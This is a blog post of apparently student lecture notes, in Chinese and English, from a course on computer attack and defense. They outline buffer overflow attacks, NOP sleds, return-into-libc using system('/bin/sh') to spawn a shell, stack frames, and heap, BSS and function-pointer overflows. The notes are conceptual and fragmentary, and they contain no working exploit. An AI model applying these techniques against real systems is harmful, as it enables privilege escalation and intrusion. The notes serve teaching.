2014.10.08
ㄒThe Attack and Defense of Computers 141008
Dr. Fu-Hau Hsu (許富皓)





Buffer Overflow Attacks, and Heap Overflow Attacks


 
Basically started from 2-10
 
BOAsBuffer Overflow Attacks=>藉由緩衝區溢位的漏洞植入malwares
           (必考!!!)Def:所輸入的長度大於儲存的長度,相鄰緩衝區被蓋掉。
 
# Attacker create a shell => root privilege(Shell code = Attacker’s code)
Q:How to know the space of Buffer?
A:增加攻擊次數,提升成功機率(Right Place, Correct Value);
EX. Repeat address patterns, Inserts NOP(Single byte / multiple byte)
投影片中提的是理想狀況,實際上不同的hardware的instructions也不同,無法預測。

#
Non-predictable offsetSource Code and local binariesdoesn’t helpDifferent compiler, different OS/compiler);Address obfuscation…good luck may helpinsert random number of space between local variables and return address.
          
# Return-into-libc Attacks(投影片2-29~33,重要!
           A mutation of buffer overflow attacks
           Orgin:自帶Program進入 => 利用原本就存在的程式碼,只是改變pointer指向的位址。
           EX. functionsystem(“/bin/sh”) => 產生一個shell(執行一程式)
 
2-23 ebp的相對為位置表示
執行code之前->assembly->stackframe
*移動ebp=>可能記憶體區塊殘留舊值

2-25
#Prologue and Epilogue(2-25~26)

#
Heap/Data/BSS Overflow Attacks
BSS:不會存在執行檔中,通常用來存放無初始值的global variable(type, 會用多少空間的紀錄)

*
data section initialized at compile-time
 
2-39
OBAs應用:改操作對象而非改變程式碼
# Function Pointer Attack
comment 0 trackback 0
引用 URL
http://icebreak310.blog.fc2blog.us/tb.php/195-4ba5494e
引用:
留言:
只对管理员显示